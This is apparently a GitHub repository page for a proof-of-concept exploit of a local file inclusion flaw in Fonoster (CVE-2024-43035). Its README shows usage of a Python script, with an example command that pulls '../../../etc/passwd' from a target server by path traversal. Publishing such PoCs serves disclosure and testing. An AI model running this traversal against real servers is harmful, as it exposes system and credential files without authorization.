Skip to content

Proof-of-concept exploit for Fonoster LFI vulnerability (CVE-2024-43035)

Notifications You must be signed in to change notification settings

ZeroPathAI/Fonoster-LFI-PoC

Folders and files

NameName
Last commit message
Last commit date

Latest commit

 

History

5 Commits
 
 
 
 

Repository files navigation

CVE-2024-43035 - Fonoster LFI Proof of Concept

This repository contains a Proof of Concept (PoC) script demonstrating a Local File Inclusion vulnerability in Fonoster. This tool is for educational and authorized testing purposes only.

Usage

Read Local File

To retrieve a local file from the server:

python3 fonoster_lfi_poc.py --url <fonoster_server_url> --path <file_path_to_retrieve>

Example:

python3 fonoster_lfi_poc.py --url http://example.com --path "../../../etc/passwd"

z

About

Proof-of-concept exploit for Fonoster LFI vulnerability (CVE-2024-43035)

Resources

Stars

Watchers

Forks

Releases

No releases published

Packages

No packages published

Languages